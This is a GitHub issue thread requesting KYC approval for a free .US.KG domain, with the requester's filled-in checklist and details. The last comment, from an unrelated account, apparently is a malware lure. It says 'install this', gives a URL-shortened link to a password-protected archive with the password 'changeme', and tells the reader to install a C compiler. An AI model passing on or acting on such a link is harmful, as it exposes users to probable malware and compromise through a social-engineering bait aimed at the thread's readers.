### ISSUE TITLE
Request GitHub KYC-gfftr5r43tdw@zohomail.com

### ISSUE THREAD

**Issue by jiu8f7jhnfbprffmko0l** [DigitalPlatDev/US.KG#9762]
### KYC Using Your GitHub Account

We use automated scripts to approve requests. Please make sure your GitHub account meets the following requirements (all are required):

- [x] I have starred this repository.
- [x] The issue title must be: Request GitHub KYC - Your US.KG Panel registered email. This ensures our automated script can detect your registered email.
- [x] This is not a new GitHub account; it has existing repositories and stars.
- [x] This is my first US.KG NIC Panel account.
- [x] I promise not to use the domain name for criminal or abusive purposes.

**Your Account Details (US.KG NIC Panel):**

Please fill out the following information; otherwise, your request will not be processed:

- Username: 
- Account Registration Email: 
- Reason for Registering the .US.KG Domain Name:

**Comment by jiu8f7jhnfbprffmko0l** [comment]
Username:oikjoi98u8yu
Account Registration Email:gfftr5r43tdw@zohomail.com
Reason for Registering the .US.KG Domain Name: I want to use a free domain name

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
